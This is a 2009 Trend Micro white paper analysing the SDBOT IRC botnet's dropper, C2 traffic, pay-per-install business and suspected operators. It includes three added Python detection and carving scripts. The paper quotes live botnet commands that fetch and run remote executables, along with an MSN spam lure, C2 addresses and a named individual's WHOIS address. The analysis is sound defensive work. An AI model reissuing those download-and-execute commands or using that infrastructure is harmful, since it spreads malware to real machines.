SDBOT IRC Botnet Continues to Make Waves

Trend Micro, Incorporated

Loucif Kharouni
Trend Micro Threat Research

A Trend Micro White Paper I December 2009



CONTENTS

Overview ............................................................ 3
BKDR_SDBOT.COD Analysis ............................................. 4
   Stage 1: Initial Installer ....................................... 4
      TROJ_DROPPR.BH Details ........................................ 4
      BKDR_SDBOT.COD Details ........................................ 5
   Stage 2: IRC Communication ....................................... 6
   Stage 3: Third-Party Malware ..................................... 7
      TROJ_CUTWAIL (PUSHDO/PANDEX) .................................. 8
      TROJ_FAKEAV ................................................... 8
      WORM_KOOBFACE ................................................. 8
Social Engineering .................................................. 9
   Spam Wave 1: Self-Promotion Spam ................................. 9
   Spam Wave 2: Prestige Replica Spam ............................... 9
   Spam Wave 3: Other Social Engineering Spam ...................... 10
Behind the Malware: Botnet Owners .................................. 11
SDBOT, the Pay-per-Install Model, and FAKEAV ....................... 15
Best Practices to Avoid SDBOT Malware Infection .................... 17
Conclusion ......................................................... 18
References ......................................................... 20




2   WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES


OVERVIEW

SDBOT malware variants usually propagate through network shares and by exploiting
unpatched vulnerabilities. They also exhibit a number of backdoor capabilities and some
information theft routines. Some variants even have the capability to bypass security
measures and to overwrite system files in order to maximize their network connection
capacity.

SDBOT malware have been around since at least 2004. Most of the bots that use Internet
Relay Chat (IRC) protocol communication, such as AGOBOT, IRCBOT, RBOT, and others,
have been around since at least 2001. However, these kinds of malware rarely attract
attention because they operate silently. These bot malware are neither heavy email
spammers nor resource hogs. They hardly ever disrupt normal computer activities—say,
Internet browsing—so their victims never notice that their computers have been infected.

In this paper, the researcher focused on SDBOT variants and their final payload—the
installation of pay-per-install programs.

The contents of this paper are targeted at security analysts and specialists. It includes
an in-depth technical analysis of the SDBOT threat and takes a look behind the scenes
at the business model used by the cybercriminal gang to rent out SDBOT’s reach and
download capability.






BKDR_SDBOT.COD ANALYSIS

Stage 1: Initial Installer

BKDR_SDBOT.COD is typically dropped by a Trojan detected by Trend Micro as
TROJ_DROPPR.BH. SDBOT.COD arrives as a file named photo.com that is actually a simple
Win32 Cabinet Self-Extractor renamed into a .COM file. If this file is renamed as an
executable file (by changing the file name extension to .EXE), the embedded file named
burim.exe can then be extracted.

TROJ_DROPPR.BH Details

   Filename: photo.com
   MD5: 613ceb085ee2ad31e1f95249d804409e
   SHA-1: b73ae87c167c8ec0e9e52000d7d3d8e9ecaba27a

Here are some snippets from the Trojan’s code. The Microsoft .CAB file (MSCF) header
of the Cabinet file was found to be 4D534346, the ASCII string “MSCF” (see Figure 1).




                                                                               Figure 1. MSCF header [4D534346]

                                                    To extract the contents of the Cabinet file, the strings starting at MSCF were first selected
                                                    and saved as burim.cab (see Figure 2).




                                                                         Figure 2. Extracting burim.cab from photo.com
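The carving step shown in Figures 1 and 2, written up here as an added example (not code from the paper): locate the MSCF signature, check that a real CFHEADER follows it, and cut out exactly cbCabinet bytes. The input is a constructed stand-in for photo.com, not the real sample; it contains a decoy “MSCF” string to show why the header has to be validated rather than matched on signature alone.

```python
import struct
import sys

# A Microsoft Cabinet starts with the ASCII signature "MSCF" (bytes 4D 53 43 46),
# the marker the analysis located inside photo.com.
MSCF_SIGNATURE = b"MSCF"

# Fixed part of the CFHEADER structure (little-endian):
#   signature 4s | reserved1 u32 | cbCabinet u32 | reserved2 u32 | coffFiles u32 |
#   reserved3 u32 | versionMinor u8 | versionMajor u8 | cFolders u16 | cFiles u16 |
#   flags u16 | setID u16 | iCabinet u16
CFHEADER_FMT = "<4sIIIIIBBHHHHH"
CFHEADER_SIZE = struct.calcsize(CFHEADER_FMT)  # 36 bytes
CFHEADER_FIELDS = ("signature", "reserved1", "cbCabinet", "reserved2", "coffFiles",
                   "reserved3", "versionMinor", "versionMajor", "cFolders", "cFiles",
                   "flags", "setID", "iCabinet")


def find_signatures(data: bytes) -> list:
    """Every offset at which the MSCF signature occurs, valid header or not."""
    offsets, pos = [], data.find(MSCF_SIGNATURE)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(MSCF_SIGNATURE, pos + 1)
    return offsets


def parse_cfheader(data: bytes, offset: int) -> dict:
    """Decode the CFHEADER at offset into a field-name -> value dict."""
    return dict(zip(CFHEADER_FIELDS, struct.unpack_from(CFHEADER_FMT, data, offset)))


def header_is_plausible(hdr: dict, offset: int, total_len: int) -> bool:
    """Reject signature hits that are not followed by a usable cabinet header."""
    size = hdr["cbCabinet"]
    return (hdr["versionMajor"] == 1 and hdr["versionMinor"] == 3     # CAB format 1.3
            and CFHEADER_SIZE <= size <= total_len - offset              # fits in the file
            and CFHEADER_SIZE <= hdr["coffFiles"] < size                 # CFFILE table inside
            and hdr["cFolders"] >= 1 and hdr["cFiles"] >= 1)


def carve_cabinets(data: bytes) -> list:
    """Return one dict per embedded cabinet: offset, size, counts and the carved bytes."""
    found = []
    for off in find_signatures(data):
        if off + CFHEADER_SIZE > len(data):
            continue
        hdr = parse_cfheader(data, off)
        if header_is_plausible(hdr, off, len(data)):
            found.append({"offset": off, "size": hdr["cbCabinet"], "folders": hdr["cFolders"],
                          "files": hdr["cFiles"], "blob": data[off:off + hdr["cbCabinet"]]})
    return found


def build_constructed_sample() -> bytes:
    """Constructed stand-in for photo.com (not the real sample): a stub containing a
    decoy "MSCF" string, then a minimal valid cabinet, then trailing bytes."""
    stub = b"MZ" + b"\x90" * 300 + b"MSCF is a string, not a header"
    cab_body = b"\x00" * 100                  # stands in for CFFOLDER/CFFILE/CFDATA
    cb_cabinet = CFHEADER_SIZE + len(cab_body)
    header = struct.pack(CFHEADER_FMT, MSCF_SIGNATURE, 0, cb_cabinet, 0,
                         CFHEADER_SIZE + 8, 0, 3, 1, 1, 1, 0, 0x1234, 0)
    return stub + header + cab_body + b"\x00" * 16


if __name__ == "__main__":
    # Usage: python carve_cab.py <input file> [output .cab]; with no arguments the
    # constructed sample is carved instead.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_constructed_sample()
    for cab in carve_cabinets(data):
        print(f"cabinet at offset {cab['offset']}: {cab['size']} bytes, "
              f"{cab['folders']} folder(s), {cab['files']} file(s)")
        if len(sys.argv) > 2:
            with open(sys.argv[2], "wb") as fh:
                fh.write(cab["blob"])
```

The carved blob can then be handed to any CAB extractor to recover the embedded executable, as the analysis did with burim.cab.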








                                                                          Figure 3. burim.exe extracted from burim.cab

The dropper (photo.com) performs some system changes. It then creates the following
registry entry, which deletes the temporary extraction folder at the next startup:

   HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
   rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32
   “C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP”



                                                    It also creates the following folder and files:

  • C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP
  • C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\TMP4351$.TMP
  • C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\burim.exe

                                                    The dropped file burim.exe is a backdoor.

                                                    BKDR_SDBOT.COD Details


                                                       Filename: burim.exe; fxstaller.exe
                                                       MD5: 2515df8f2df211e969da5d15d995da0e
                                                       SHA-1: a4f832556e9d4e8803b74ff40d7c0fd5b1fa8609


BKDR_SDBOT.COD places a copy of itself in the C:\Windows folder as fxstaller.exe and
creates the following registry entry to ensure its automatic execution at every system
startup:

   HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
   Windows UDP Control Center = fxstaller.exe

Upon execution, BKDR_SDBOT.COD connects to the following IRC server:

   dddd.burimche.net -> 89.255.10.90
   IP Address    89.255.10.90
   Host          unassigned-89-255-10-90.rdns.hosting-concepts.nl
   Location      NL, Netherlands
   City          Rotterdam, 11
   Organization  Netnation Europe V.O.F.
   ISP           Netnation Europe V.O.F.
   AS Number     AS15703 TrueServer BV






                                                    However, the IP address (89.255.10.90) may vary. During testing, the IP address changed
                                                    every now and then to any of the following:

                                                      • 69.175.13.42

                                                      • 174.133.29.34

                                                      • 218.61.22.10

                                                    It then joins the IRC channel, ##bb##. It also creates the mutex, LiNbagGgsag, to ensure
                                                    that only one instance of itself is running in memory.

                                                    Stage 2: IRC Communication

Once back-and-forth communication has been established, the victim’s computer
effectively becomes a zombie. It can now be controlled by remote users—the creators of
SDBOT—via IRC. As shown in the IRC communication in Figure 4, which is sent to a
zombie machine, commands are sent to the victim’s computer to download third-party
malware. This is part of the pay-per-install business.




   Figure 4. IRC screen communication instructing victim’s computer to download files

   :Bul-rdp!Bur-rdp@bur.gov TOPIC ##bb## :.p.karikar http://stashbox.org/543111/a.exe c:\tpde.exe 1



The machine then downloads the file a.exe from stashbox.org, saves it to the root of the
system’s C: drive as tpde.exe, and then runs it.

   :Bul-rdp!Bur-rdp@bur.gov PRIVMSG ##bb## :.p.karikar http://www.iliridas.com/girl.exe c:\tafe.exe 1






                                                    In the screenshot below (see Figure 5), the malware attempts to propagate via MSN, a
                                                    popular instant messaging (IM) application.




                                                                       Figure 5. Malware attempts to propagate via MSN

The bot master—the remote user who currently controls the network of compromised
machines—sends commands via IRC with the link to spam to all MSN Messenger
contacts found, using the following strings:

   :get.lost 332 [NM00|FRA|79016] #!msn1! : !msn.stop| !msn.msg
   Hey, is this really you ?! : ) hxxp://www.main-gallery.com/image.php?=[msn email add of zombie machine]


                                                    The message strings above are then sent to all of the victim’s MSN Messenger contacts.
                                                    The contact who receives the message may likely assume that the message came
                                                    from a trusted contact. If, however, he/she clicks the link in the message, he/she will be
                                                    prompted to download and execute a file (i.e., the SDBOT malware).
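As an added example (not code from the paper), a parser for the IRC lines quoted in Stage 2 and in the MSN passage above, with detection logic that flags the two command shapes the bot master used: “.p.karikar <url> <destination path> <flag>” delivered via TOPIC, PRIVMSG or a 332 topic reply, and “!msn.msg <lure text>”. The transcript is constructed, with a labelled placeholder standing in for the victim’s MSN address; the field names given to the command arguments are this example’s reading of the quoted lines, not documented SDBOT options.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed transcript, not a capture from the paper. Lines 1, 2 and 4 reproduce the
# bot commands quoted in the analysis (with a labelled placeholder for the victim's MSN
# address); the remaining lines are ordinary IRC traffic added as negatives.
SAMPLE_LINES = [
    ":Bul-rdp!Bur-rdp@bur.gov TOPIC ##bb## :.p.karikar http://stashbox.org/543111/a.exe c:\\tpde.exe 1",
    ":Bul-rdp!Bur-rdp@bur.gov PRIVMSG ##bb## :.p.karikar http://www.iliridas.com/girl.exe c:\\tafe.exe 1",
    ":someone!u@h PRIVMSG ##bb## :hello, anyone here?",
    ":get.lost 332 [NM00|FRA|79016] #!msn1! : !msn.stop| !msn.msg Hey, is this really you ?! : ) "
    "hxxp://www.main-gallery.com/image.php?=[ZOMBIE_MSN_EMAIL]",
    "PING :irc.example.test",
]


@dataclass
class IrcMessage:
    prefix: Optional[str]    # "nick!user@host" or server name, without the leading ':'
    command: str             # verb such as PRIVMSG/TOPIC, or a numeric reply such as 332
    params: List[str]        # middle parameters
    trailing: Optional[str]  # the parameter after " :", which carries the actual text


def parse_irc_line(line: str) -> IrcMessage:
    """Split one RFC 1459 line into prefix, command, middle parameters and trailing text."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    parts = line.split()
    if not parts:
        raise ValueError("empty IRC line")
    return IrcMessage(prefix, parts[0].upper(), parts[1:], trailing)


@dataclass
class Alert:
    kind: str         # "download_exec" or "msn_spam"
    channel: str
    delivery: str     # TOPIC, PRIVMSG, or 332 (the topic replayed to a bot as it joins)
    issued_by: str    # nick part of the prefix
    url: str
    detail: str       # destination path and flag, or the lure text


# ".p.karikar <url> <destination path> <flag>": the download command quoted in the analysis.
DOWNLOAD_RE = re.compile(r"\.p\.karikar\s+(?P<url>\S+)\s+(?P<dest>\S+)\s+(?P<flag>\d+)\s*$", re.I)
# "!msn.msg <lure text>": the MSN spam instruction quoted in the analysis.
MSN_RE = re.compile(r"!msn\.msg\s+(?P<text>.+?)\s*$", re.I)
# Accepts live http(s):// links and hxxp:// defanged ones.
URL_RE = re.compile(r"h(?:tt|xx)ps?://\S+", re.I)


def channel_and_delivery(msg: IrcMessage) -> Optional[tuple]:
    """(channel, delivery) for the message types that can carry a command to the bots."""
    if msg.command in ("TOPIC", "PRIVMSG") and msg.params:
        return msg.params[0], msg.command
    if msg.command == "332" and len(msg.params) >= 2:   # RPL_TOPIC: <nick> <channel> :<topic>
        return msg.params[1], msg.command
    return None


def detect(msg: IrcMessage) -> Optional[Alert]:
    """Match one parsed message against the two command shapes seen in the paper."""
    target = channel_and_delivery(msg)
    if target is None or not msg.trailing:
        return None
    channel, delivery = target
    issued_by = (msg.prefix or "").split("!")[0]
    text = msg.trailing.strip()
    m = DOWNLOAD_RE.search(text)
    if m:
        return Alert("download_exec", channel, delivery, issued_by, m.group("url"),
                     f"{m.group('dest')} flag={m.group('flag')}")
    m = MSN_RE.search(text)
    if m:
        lure = m.group("text")
        u = URL_RE.search(lure)
        return Alert("msn_spam", channel, delivery, issued_by, u.group(0) if u else "", lure)
    return None


def scan_transcript(lines) -> List[Alert]:
    """Run every line through the parser and collect the alerts."""
    alerts = []
    for line in lines:
        try:
            msg = parse_irc_line(line)
        except ValueError:
            continue
        alert = detect(msg)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan_transcript(SAMPLE_LINES):
        print(f"{a.kind:13} via {a.delivery:7} on {a.channel:8} from {a.issued_by!r}: {a.url} | {a.detail}")
```

Handling the 332 numeric matters because a topic set once with TOPIC is replayed by the server to every bot that joins later, so a capture taken after the fact still shows the command.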

                                                    Stage 3: Third-Party Malware

                                                    The victim’s computer downloads any of several possible non-SDBOT malware listed
                                                    below. Note, however, that this is not an exhaustive list.

  • BKDR_POISON
  • TROJ_BUZUS
  • TROJ_CUTWAIL
  • TROJ_FAKEAV
  • TROJ_RENOS
  • TROJ_SMALL
  • TROJ_VUNDO
  • WORM_AUTORUN
  • WORM_KOOBFACE
  • WORM_MAINBOT






Some of the malware listed are among the more dangerous ones researchers have seen
recently. The following sections provide short profiles of some of these malware, whose
routines make vivid how dangerous it is to be part of an IRC botnet nowadays.

TROJ_CUTWAIL (PUSHDO/PANDEX)

If a machine is infected by TROJ_CUTWAIL, it is almost certainly part of a botnet called
“CUTWAIL” (also known as “PUSHDO” or “PANDEX”). This botnet is one of the largest
spam botnets in the world. It has been responsible for several known spam campaigns
that advertise pharmaceutical products (e.g., Viagra) or pharmaceutical companies
(e.g., Canadian Pharmacy).

                                                    This botnet is also responsible for malware-related spam campaigns, specifically the
                                                    recent U.S. Independence Day spam, which contained malicious links that, when clicked,
                                                    led recipients to a website to download a WORM_WALEDAC variant. Researchers have
                                                    also seen this botnet send out ecard spam in July. These email messages bore the
                                                    same email body even though the attached file ecard.exe could either be a TROJ_
                                                    CUTWAIL or a TROJ_ZBOT variant.

                                                    TROJ_FAKEAV

Most security/tech-savvy users are already familiar with rogue antivirus (FAKEAV)
malware. These programs usually claim to rid a system of infections that, in fact, the
program itself planted. In recent months, these FAKEAV variants arrived as the final
payload of blackhat search engine optimization (SEO) attacks. However, FAKEAV can also
be part (i.e., one of the links) of other malware infection chains.

                                                    WORM_KOOBFACE

                                                    KOOBFACE is well-known for spreading among social networking websites such as
                                                    Facebook, Friendster, Twitter, and some others. Users may receive spammed messages
                                                    in their Facebook inboxes containing links to a particular video. These links, however,
                                                    lead to the download of a KOOBFACE variant instead. KOOBFACE is one of the biggest
                                                    Web 2.0 botnets spreading on Facebook, MySpace, and Twitter.






SOCIAL ENGINEERING

SDBOT uses various social engineering techniques to lure victims, the most common of
which is running spam waves.

Spam Wave 1: Self-Promotion Spam

Self-promotion spam waves send malicious links to personal profile pages or files with
a short message in order to convince users to click the link and therefore download a
malicious file, which will connect them to the botnet (see Figure 6).




                                                                                Figure 6. Self-promotion spam

                                                    Spam Wave 2: Prestige Replica Spam

                                                    Prestige replica spam waves send links to replica sites with a short message in order to
                                                    convince users to click the link and therefore buy replica watches (see Figure 7).




                                                                                Figure 7. Prestige replica spam






Spam Wave 3: Other Social Engineering Spam

Most of the social engineering spam waves send malicious links to sites that host news
on popular events (e.g., Michael Jackson’s death), with a short message in order to
convince users to click the link and therefore download a malicious file, which will
connect them to the botnet (see Figure 8).




                                                                           Figure 8. Other social engineering spam






                                                     BEHIND THE MALWARE: BOTNET OWNERS
                                                     As part of this study, the researcher has been looking at everything related to the
                                                     burimche.net domain, including the following:

                                                      •	 *.burimilol.com

                                                      •	 *.burimilol.net

                                                      •	 *.burimche.net

                                                      •	 burimi.*.net

While looking for information about these domain names, the researcher came across a
forum where two members were talking about an executable file for sale. One of them
was complaining that the user burimi @ nerashti.com had not created the file as promised
even though he had already paid for that service.

Continuing the investigation on domain names, the researcher also looked for the
newest related domain names but found that they have all been registered through either
Yahoo! or Altavista. The manner by which the cybercriminals registered domain names
has changed, making it harder for researchers to track them back. So the researcher
decided to take a look instead at the oldest domain name—burimilol.net—and found the
following:

                                                        [BURIMILOL.NET]
                                                        BURIM ALIJI
                                                        NERASHTI 1203
                                                        TETOVO, 91200
                                                        MACEDONIA
                                                        ALBANIA

                                                        [MAINMSN.COM]
                                                        nicKy, FisniK
                                                        NERASHTI
                                                        TETOVO, 20000
                                                        source://myspc.net/wievimage.php
                                                        Registrant MYSPC.NET:
                                                        Bruno (edinplay@gmail.com)
                                                        fajro 14
                                                        Ulqin* - Laç 40000
                                                        ALGERIA

                                                        *Ulqin is located in Montenegro not in Algeria.


                                                     Burim in Albanian means “source.”

These findings suggest that these threats could originate from Albania, Macedonia,
or Montenegro.






As stated earlier, it has become hard to track the cybercriminals based on domain names
as, for some reason, they have resorted to using free Internet services from providers
such as Yahoo! or Altavista. The cybercriminals continuously changed IP addresses
as well, making the task even harder. For instance, tracking a single domain name can
lead to several different IP addresses. In a month, a domain name can have around four
different IP addresses (see Figure 9).




                                                                 Figure 9. IP addresses a single domain name can connect to

                                                    The botnet sends links to several domain names via MSN (see Figure 10).








                                                                                Figure 10. Links sent to MSN

                                                    Given the nature of SDBOT—that it is primarily geared toward downloading other
                                                    malware files that each have their own distinct payloads and strong connections with
                                                    other malware families—it appears that the botnet is in the business of renting out its
                                                    reach and download capability to cybercriminals. These cybercriminals may either be
                                                    interested in increasing their number of victims or in sending out spammed messages
                                                    for various other purposes. This is a known malware business model wherein some
                                                    cybercriminal gangs pay others to spread their malicious code. For the longest time,
                                                    instead of conducting their own focused attacks, the SDBOT cybercriminal gang
                                                    is keeping itself busy by responding to different business requests such as installing
                                                    FAKEAV, KOOBFACE, CUTWAIL, and other malware variants on their infected bots.

As security experts and threat researchers already know by now, botnets do not only
bring about big business; they are also, to a certain logical extent, interconnected to
one another. Cybercriminals do business with other cybercriminals. This allows them to
take advantage of other, possibly better, technologies and newer ways to spread their
malicious code than when they do so on their own.






                                                    On top of being cybercriminals, they are first “real” criminals who conduct illegal business
                                                    by stealing money and crucial/private information and ruining companies’ businesses.
                                                    Cybercriminal interconnections are becoming more popular. Working together is no
                                                    longer a problem among cybercriminals as in the past. As such, they have become
                                                    stronger and harder to track. It is easy to see that money is driving all these illegal
                                                    activities. The only remaining question is, “Why use an ‘old’ technology such as an IRC
                                                    botnet when lots of newer technologies can already be seen in the wild?”

The answer is quite simple—because this kind of botnet is currently off the radar, unlike
several others (DOWNAD, ZEUS, WALEDAC, KOOBFACE, ILOMO, and PUSHDO),
which are consistently being monitored by researchers. Using a simple but effective type
of botnet makes cybercriminals feel like they are in “heaven.” They can opt to use not
only one but several ways to spread malware.






SDBOT, THE PAY-PER-INSTALL MODEL, AND FAKEAV

FAKEAV variants are currently taking the threat landscape by storm. The use of the
pay-per-install business model is also increasing as the model is easy to use. A botnet
owner now gets paid to install malware on infected PCs. For instance, a FAKEAV creator
pays the SDBOT gang, which already owns an IRC botnet and controls thousands of
infected machines, to easily push the FAKEAV file to systems. The gang then gets paid a
certain amount of money for each successful installation (see Table 1).

   Country Code    Price
   US              US$120
   BR              US$60
   TR              US$45
   Mixed           US$25
   GB, CA, DE      US$150

   Table 1. Pay-per-install FAKEAV price list

The following country codes can be included in mixed lists:

A2, AE, AF, AM, AR, AT, AU, AZ, BD, BE, BG, BH, BR, BY, CA, CH, CI, CL, CN, CO,
CZ, DE, DZ, EC, EG, ES, EU, FR, GB, GE, GH, GR, HK, HR, HU, ID, IL, IN, IQ, IR,
IT, JO, JP, KG, KH, KR, KW, KZ, LK, LT, LV, LY, MA, MD, MK, MX, MY, NG, NI, NL,
NP, NZ, OM, PA, PE, PH, PK, PL, PT, QA, RO, RS, RU, SA, SE, SG, SI, SK, SY, TH,
TN, TR, TW, TZ, UA, US, UY, UZ, VN, YE, ZA

As shown, the prices paid depend mainly on the target country, because the difficulty
of compromising systems there is taken into account. For instance, compromising a
computer located somewhere in North America or Europe is harder to do because it is
better protected, and hence costs more. However, because more people have Internet
access in these countries, more systems can be compromised in them, which
cybercriminals also take into consideration.

Pay-per-install services are publicly available on many Russian underground forums.
Anyone can offer pay-per-install services for money. Target systems can be chosen in
terms of:

  • Region

  • Country

  • OS

  • Language

Another way to make money in the pay-per-install business is to register in
underground-affiliated websites (see Figure 11). Cybercriminals will provide the malware
sample to interested parties who will then make it available for victims to install. Once
interested parties get the malware from an affiliate site, they bind it with a popular
program and post it via torrents or peer-to-peer (P2P) networks. Binding is a popular
technique used to merge two files together. For example, any Trojan can be merged with
Adobe Acrobat Writer, which can then be made available for download in torrents.
Unknowing users will then get a free Trojan with Adobe Acrobat Writer. Binder tools are
available all over the Web and not too hard to find.






BEST PRACTICES TO AVOID SDBOT MALWARE INFECTION

In the course of conducting research on SDBOT variants, the researcher came across
some useful dos and don’ts that users can employ to avoid SDBOT malware infection:

  • Do not click links sent via IM applications, especially if you do not know who sent
    them.

  • Do update your security applications regularly to decrease the chances of becoming
    infected.

  • Do not open unsolicited email or spam.






CONCLUSION

In this paper, we saw how this threat connects a user’s system to an IRC network. We
also saw how the botnet uses an infected system to spread other malware, which may
connect it to another botnet. We observed how cybercriminals go about their business
and how their networks are structured.

As such, we recommend the use of free tools such as RUBotted (see Figures 12 and 13)
to detect if a computer is part of an IRC botnet and HouseCall (see Figure 14) to clean
an infected system. RUBotted monitors computers for suspicious activities and regularly
checks with an online service to identify behaviors associated with bots.
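The conclusion recommends a tool that watches for behaviour associated with IRC bots. The Python script below is an added example of what such a check can look like at the network level; it is not RUBotted's logic and not Trend Micro code. It parses the client side of a captured IRC session using the RFC 1459 message grammar (optional prefix, command, parameters, trailing parameter) and flags traits a defender would want to review: IRC on a port other than the usual 6667/6697, a nick that looks generated, a join to a key-protected channel, and a client that joins a channel but never talks. The digit-run threshold, the two sample streams, the nick and channel names in them, and port 8800 are constructed for illustration and are not values from the paper.

```python
"""Heuristic triage of a captured IRC client-to-server stream for bot-like traits.

Added example accompanying the conclusion of this paper. It is NOT RUBotted's
logic and not Trend Micro code. Message grammar follows RFC 1459; the indicator
thresholds, sample streams and port 8800 below are constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# RFC 1459 message: [':' prefix SPACE] command [SPACE params] [SPACE ':' trailing]
_MSG = re.compile(r"^(?::(?P<prefix>\S+)\s+)?(?P<cmd>[A-Za-z]+|\d{3})(?:\s+(?P<rest>.*))?$")

# Commands a client normally sends; anything else is treated as non-IRC text.
KNOWN_COMMANDS = {"PASS", "NICK", "USER", "JOIN", "PART", "PRIVMSG", "NOTICE",
                  "PING", "PONG", "MODE", "TOPIC", "QUIT"}
STANDARD_IRC_PORTS = {6667, 6697}   # plaintext and TLS defaults
MIN_DIGIT_RUN = 4                   # assumption: a nick with >=4 consecutive digits
                                    # looks generated rather than chosen by a person


@dataclass
class IrcMessage:
    command: str
    params: List[str]


def parse_irc_line(line: str) -> Optional[IrcMessage]:
    """Split one raw line into command and parameters; None if it is not IRC."""
    m = _MSG.match(line.strip("\r\n"))
    if not m:
        return None
    cmd = m.group("cmd").upper()
    if not cmd.isdigit() and cmd not in KNOWN_COMMANDS:
        return None
    rest = m.group("rest") or ""
    if rest.startswith(":"):                # only a trailing parameter
        params = [rest[1:]]
    elif " :" in rest:                      # middle parameters plus a trailing one
        head, trailing = rest.split(" :", 1)
        params = head.split() + [trailing]
    else:
        params = rest.split()
    return IrcMessage(cmd, params)


def analyze_session(lines: List[str], dst_port: int) -> Dict:
    """Return nick, joined channels and a list of bot-like indicators for one stream."""
    msgs = [m for m in (parse_irc_line(l) for l in lines) if m]
    cmds = {m.command for m in msgs}
    result: Dict = {"is_irc": False, "nick": None, "channels": [], "indicators": []}
    if not {"NICK", "USER"} <= cmds:        # no registration handshake: not an IRC client
        return result
    result["is_irc"] = True
    ind = result["indicators"]
    for m in msgs:
        if m.command == "NICK" and m.params:
            result["nick"] = m.params[0]
        elif m.command == "JOIN" and m.params:
            result["channels"].extend(m.params[0].split(","))
            if len(m.params) > 1:           # JOIN <channel> <key>: password-protected channel
                ind.append(f"keyed channel join: {m.params[0]}")
    if dst_port not in STANDARD_IRC_PORTS:
        ind.append(f"IRC protocol on non-standard port {dst_port}")
    nick = result["nick"] or ""
    if re.search(rf"\d{{{MIN_DIGIT_RUN},}}", nick):
        ind.append(f"generated-looking nick: {nick}")
    if result["channels"] and "PRIVMSG" not in cmds:
        ind.append("joined channel(s) but never sent a message (silent listener)")
    return result


# Constructed sample streams (client side only); not captures from the paper.
BENIGN_STREAM = [
    "NICK alice",
    "USER alice 0 * :Alice",
    "JOIN #python",
    "PRIVMSG #python :hello everyone",
    "PING :irc.example.net",
]
BOT_LIKE_STREAM = [
    "NICK [US|XP|3948201]",
    "USER xp 0 * :xp",
    "JOIN #c0 s3cret",
    "PONG :irc.example.net",
]

if __name__ == "__main__":
    for name, stream, port in (("benign", BENIGN_STREAM, 6667),
                               ("bot-like", BOT_LIKE_STREAM, 8800)):
        r = analyze_session(stream, port)
        print(f"{name}: nick={r['nick']} channels={r['channels']}")
        for i in r["indicators"]:
            print("  -", i)
```

Feeding it the client side of a reassembled TCP stream is enough; the server replies are not needed. None of the indicators alone proves infection (people do sit silently in keyed channels on odd ports), so the output is a triage list to pair with the host-side check the paper recommends rather than a verdict.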




Figure 11. RUBotted GUI

Figure 12. RUBotted message prompt

Figure 13. HouseCall GUI

HouseCall 7, Trend Micro’s latest free online scanner, leverages the Smart Protection
Network to deliver fast detection and removal of active malware. It zeroes in on active
threats by checking key system areas used by malware programs. It also checks for
malicious browser plug-ins, rootkits, and other auto-run executable files. Its new features
include:

  • A browser-independent client that eliminates compatibility issues often associated
    with other browser-activated scanners

  • Smart Scan technology for targeted scanning of active malware, reducing scan time
    to several minutes

  • In-the-cloud threat intelligence, delivering immediate detection while reducing
    download requirements

  • Smart feedback that shares threat information with the Smart Protection Network,
    enabling data correlation across a global intelligence network to quickly discover
    new threats

  • Review and restore functionality that lets a user compare current with past scan
    results and recover files

HouseCall is Trend Micro’s highly popular and capable on-demand scanner for
identifying and removing viruses, Trojans, worms, unwanted browser plug-ins, and other
malware.







REFERENCES

  • Trend Micro. (2009). Threat Encyclopedia. “BKDR_SDBOT.COD.”
    http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=BKDR_SDBOT.COD
    (Retrieved August 2009).

  • Trend Micro. (2009). Threat Encyclopedia. “TROJ_DROPPR.BH.”
    http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DROPPR.BH
    (Retrieved August 2009).




TREND MICRO™
Trend Micro Incorporated is a pioneer in secure content and threat management.
Founded in 1988, Trend Micro provides individuals and organizations of all sizes with
award-winning security software, hardware and services. With headquarters in Tokyo and
operations in more than 30 countries, Trend Micro solutions are sold through corporate
and value-added resellers and service providers worldwide. For additional information
and evaluation copies of Trend Micro products and services, visit our Web site at
www.trendmicro.com.

TREND MICRO INC.
10101 N. De Anza Blvd.
Cupertino, CA 95014
US toll free: 1 +800.228.5651
Phone: 1 +408.257.1500
Fax: 1 +408.257.2003
www.trendmicro.com

©2009 by Trend Micro, Incorporated. All rights reserved. Trend Micro, the Trend Micro
t-ball logo are trademarks or registered trademarks of Trend Micro, Incorporated. All
other product or company names may be trademarks or registered trademarks of their
owners.

Mais conteúdo relacionado

Mais de Trend Micro

Cybercrime In The Deep Web
Cybercrime In The Deep WebCybercrime In The Deep Web
Cybercrime In The Deep WebTrend Micro
 
AIS Exposed: New vulnerabilities and attacks. (HITB AMS 2014)
AIS Exposed: New vulnerabilities and attacks. (HITB AMS 2014)AIS Exposed: New vulnerabilities and attacks. (HITB AMS 2014)
AIS Exposed: New vulnerabilities and attacks. (HITB AMS 2014)Trend Micro
 
HBR APT framework
HBR APT frameworkHBR APT framework
HBR APT frameworkTrend Micro
 
Captain, Where Is Your Ship – Compromising Vessel Tracking Systems
Captain, Where Is Your Ship – Compromising Vessel Tracking SystemsCaptain, Where Is Your Ship – Compromising Vessel Tracking Systems
Captain, Where Is Your Ship – Compromising Vessel Tracking SystemsTrend Micro
 
Countering the Advanced Persistent Threat Challenge with Deep Discovery
Countering the Advanced Persistent Threat Challenge with Deep DiscoveryCountering the Advanced Persistent Threat Challenge with Deep Discovery
Countering the Advanced Persistent Threat Challenge with Deep DiscoveryTrend Micro
 
The Custom Defense Against Targeted Attacks
The Custom Defense Against Targeted AttacksThe Custom Defense Against Targeted Attacks
The Custom Defense Against Targeted AttacksTrend Micro
 
Where to Store the Cloud Encryption Keys - InterOp 2012
Where to Store the Cloud Encryption Keys - InterOp 2012Where to Store the Cloud Encryption Keys - InterOp 2012
Where to Store the Cloud Encryption Keys - InterOp 2012Trend Micro
 
